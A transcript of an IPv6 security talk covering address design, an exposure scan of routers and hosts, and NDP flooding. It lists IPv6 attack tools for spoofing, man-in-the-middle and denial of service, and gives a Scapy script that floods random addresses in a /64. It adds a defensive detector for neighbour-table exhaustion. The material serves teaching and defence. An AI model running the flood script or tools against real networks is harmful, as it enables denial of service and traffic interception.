1 Rafa Sanchez Gómez – CISA [email protected] @r_a_ff_a_e_ll_o A little bit of IPv6 security

Upload: rafa-sanchez

Post on 27-Jul-2015


TRANSCRIPT

1

Rafa Sanchez Gómez – CISA [email protected] @r_a_ff_a_e_ll_o

A little bit of IPv6 security

2

1. Brief introduction to IPv6

2. Some security risks in IPv6

3. Research results

4. Demo

IPv6 Security

3

1. Brief introduction to IPv6

4

Some interesting aspects of IPv6

The main driver for IPv6 is its increased address space.

IPv6 uses 128-bit addresses.

There are different address types (unicast, anycast, and multicast) and different address scopes (link-local, global, etc.).

It’s common for a node to be using, at any given time, several addresses, of multiple types and scopes.

5

Some interesting aspects of IPv6

The “end-to-end principle” …

Each device will have a globally-unique address.

NATs will no longer be needed.

6

Hacking IPv6

7

Hacking IPv6

- parasite6: ICMP neighbor solicitation/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite)
- alive6: an effective alive scanner, which will detect all systems listening to this address
- fake_router6: announce yourself as a router on the network, with the highest priority
- redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever icmp6 redirect spoofer
- toobig6: MTU decreaser with the same intelligence as redir6
- dos-new-ip6: detect new ip6 devices and tell them that their chosen IP collides on the network (DoS)
- trace6: very fast traceroute6 which supports ICMP6 echo request and TCP-SYN
- flood_router6: flood a target with random router advertisements
- flood_advertise6: flood a target with random neighbor advertisements
- exploit6: known ipv6 vulnerabilities to test against a target
- denial6: a collection of denial-of-service tests against a target
- fuzz_ip6: fuzzer for ipv6
- implementation6: performs various implementation checks on ipv6
- implementation6d: listen daemon for implementation6 to check behind a fw
- fake_mld6: announce yourself in a multicast group on the net
- fake_mld26: same but for MLDv2

8

Hacking IPv6

    # Echo request carrying a type 0 Routing Header
    IPv6(dst="2a02:9001:0:ffff:80:58:105:253")/IPv6ExtHdrRouting(type=0,addresses=["2a02:9001:0:57::6"])/ICMPv6EchoRequest()

    #!/usr/bin/python
    from scapy.all import *

    # aleatorio ("random"): slice of a random IPv6 address, used as the low 64 bits
    def aleatorio():
        ff=str(RandIP6())
        ff=ff[20:39]
        return ff

    # Echo requests to random addresses inside one /64
    for i in range(1,100000):
        packet=IPv6(src="2001:5c0:1400:a:8000:0:580c:3aa",dst="2a02:9008:3:111:"+(aleatorio()))/ICMPv6EchoRequest()
        send(packet,iface="sit1")

9

2. Some security risks in IPv6

10

IPv4 Attack Example

Internal Network

Victim is attacked !!!

11

IPv6 Connectivity Schema

Public Prefix assigned 2a02:9008:3::/64

Administration

No NAT needed with IPv6

No internal network needed

Direct connectivity

2a02:9008:3::1

12

IPv6 Phishing Attack Example

Public Prefix assigned 2a02:9008:3::/64

Default Passwords

Brute Force (Hydra)

Exploit Known Vulnerabilities

Victim is attacked !!!

2a02:9008:3::1

Don’t work too hard

No special vulnerability in the routers is needed.

No interaction from the clients is needed.

13

Users also exposed

End-to-end model

2a02:9008:3::1

2a02:9008:3::a36:1

2a02:9008:3::a35:2

2a02:9008:3::a46:8

2a02:9008:3::a86:6

Vulnerable services !!

14

3. Research results

15

Administration Services exposed in Internet

We did some research to check whether this was a real risk, and we discovered that indeed it is…

We collected publicly available information on the Internet about IPv6 prefixes assigned by LIRs.

16

IPv4 Connectivity

17

Administration Services exposed in Internet

We scanned some of those prefixes just using nmap.

Only some of the first IPs of each prefix…

18

Administration Services exposed in Internet

19

Administration Services exposed in Internet

Mail services in IPv6: a SPAM nightmare is coming…

20

4. Demo …

21

1. Windows 7

2. Linux (Backtrack)

3. Mac OS

Tunneling…

22

NDP

Public Prefix 2a02:9008:3:f0f0::/64

2a02:9008:3:f0f0:437:af0:665:8

2a02:9008:3:f0f0:889:acb:9999:1

2a02:9008:3:f0f0:7676:bbb:9:10

23

NDP Flooding …

2a02:9008:3:f0f0:437:af0:665:8

2a02:9008:3:f0f0:889:acb:9999:1

2a02:9008:3:f0f0:7676:bbb:9:10

CAM Table

11:22:33:44:55:66 - 2a02:9008:3:f0f0:437:af0:665:8

66:55:44:33:22:11 - 2a02:9008:3:f0f0:7676:bbb:9:10

… - …

2a02:9008:3:f0f0:RAND

Public Prefix 2a02:9008:3:f0f0::/64

24

NDP Flooding in action…
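
The NDP flooding slides seen from the defender's side, as an added example that is not part of the original slides: a detector that counts, per /64, the distinct Neighbor Solicitation targets that never answer within a sliding window. The event tuple format, window and threshold are assumptions, and the sample events are constructed from the prefix and host addresses shown on the slides.

```python
import ipaddress
import random
from collections import defaultdict, deque

WINDOW_S = 10        # assumed sliding window, in seconds
MAX_UNRESOLVED = 50  # assumed alert threshold per /64 per window

def detect_nd_exhaustion(events, window=WINDOW_S, limit=MAX_UNRESOLVED):
    """events: time-ordered (ts, kind, addr) tuples seen on the router's LAN
    side; kind is 'NS' (addr is being solicited) or 'NA' (addr answered).
    Returns one (ts, prefix, unresolved_count) alert per flooded /64."""
    pending = defaultdict(deque)  # /64 -> recent (ts, target) solicitations
    answered = set()              # targets that proved to be real neighbours
    alerts, alerted = [], set()
    for ts, kind, addr in events:
        ip = ipaddress.ip_address(addr)
        net = ipaddress.ip_network(f"{ip}/64", strict=False)
        if kind == "NA":
            answered.add(ip)
            continue
        queue = pending[net]
        queue.append((ts, ip))
        while ts - queue[0][0] > window:   # drop solicitations outside the window
            queue.popleft()
        unresolved = {t for _, t in queue if t not in answered}
        if len(unresolved) > limit and net not in alerted:
            alerted.add(net)
            alerts.append((ts, str(net), len(unresolved)))
    return alerts

def sample_events():
    """Constructed data: 3 live hosts resolve, then 200 NS for random IIDs."""
    rng = random.Random(6)
    base = int(ipaddress.ip_address("2a02:9008:3:f0f0::"))
    hosts = ["2a02:9008:3:f0f0:437:af0:665:8",
             "2a02:9008:3:f0f0:889:acb:9999:1",
             "2a02:9008:3:f0f0:7676:bbb:9:10"]
    events = []
    for i, host in enumerate(hosts):
        events += [(float(i), "NS", host), (i + 0.01, "NA", host)]
    for n in range(200):
        target = ipaddress.ip_address(base + rng.getrandbits(64))
        events.append((5.0 + n * 0.01, "NS", str(target)))
    return events

if __name__ == "__main__":
    for ts, prefix, count in detect_nd_exhaustion(sample_events()):
        print(f"t={ts:.2f}s {prefix}: {count} unresolved neighbour targets")
```

Solicitations for the three live hosts are answered and never count toward the threshold; only targets with no Neighbor Advertisement accumulate, which is the signature of traffic aimed at random addresses inside the prefix.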

25

Questions ???

Rafa Sánchez Gómez [email protected] @R_a_ff_a_e_ll_o

es.linkedin.com/in/rafasanchezgomez